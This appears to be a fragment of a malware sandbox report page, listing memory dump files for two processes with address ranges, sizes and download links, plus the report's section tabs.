memory/2432-25-0x0000000002BB0000-0x0000000002BF0000-memory.dmp

Filesize
256KB

Download
memory/2432-17-0x0000000002BB0000-0x0000000002BF0000-memory.dmp

Filesize
256KB

Download
memory/2432-16-0x0000000073840000-0x0000000073DEB000-memory.dmp

Filesize
5.7MB

Download
memory/2432-28-0x0000000006640000-0x000000000855F000-memory.dmp

Filesize
31.1MB

Download
memory/2432-37-0x0000000006640000-0x000000000855F000-memory.dmp

Filesize
31.1MB

Download
memory/2432-30-0x0000000077750000-0x00000000778F9000-memory.dmp

Filesize
1.7MB

Download
memory/2432-31-0x0000000073840000-0x0000000073DEB000-memory.dmp

Filesize
5.7MB

Download
memory/2432-32-0x0000000002BB0000-0x0000000002BF0000-memory.dmp

Filesize
256KB

Download
memory/2432-33-0x0000000077940000-0x0000000077A16000-memory.dmp

Filesize
856KB

Download
memory/2432-15-0x0000000073840000-0x0000000073DEB000-memory.dmp

Filesize
5.7MB

Download
memory/2432-20-0x0000000002BB0000-0x0000000002BF0000-memory.dmp

Filesize
256KB

Download
memory/2432-63-0x0000000006640000-0x000000000855F000-memory.dmp

Filesize
31.1MB

Download
memory/2760-36-0x0000000077750000-0x00000000778F9000-memory.dmp

Filesize
1.7MB

Download
memory/2760-39-0x0000000077976000-0x0000000077977000-memory.dmp

Filesize
4KB

Download
memory/2760-61-0x0000000000DA0000-0x0000000001E02000-memory.dmp

Filesize
16.4MB

Download
memory/2760-38-0x0000000077940000-0x0000000077A16000-memory.dmp

Filesize
856KB

Download
memory/2760-64-0x0000000000DA0000-0x0000000000DE2000-memory.dmp

Filesize
264KB

Download
memory/2760-34-0x0000000001E10000-0x0000000003D2F000-memory.dmp

Filesize
31.1MB

Download
memory/2760-65-0x000000006F210000-0x000000006F8FE000-memory.dmp

Filesize
6.9MB

Download
memory/2760-67-0x000000001ED00000-0x000000001ED40000-memory.dmp

Filesize
256KB

Download
memory/2760-69-0x0000000001E10000-0x0000000003D2F000-memory.dmp

Filesize
31.1MB

Download
memory/2760-72-0x000000006F210000-0x000000006F8FE000-memory.dmp

Filesize
6.9MB

Download
memory/2760-73-0x000000001ED00000-0x000000001ED40000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads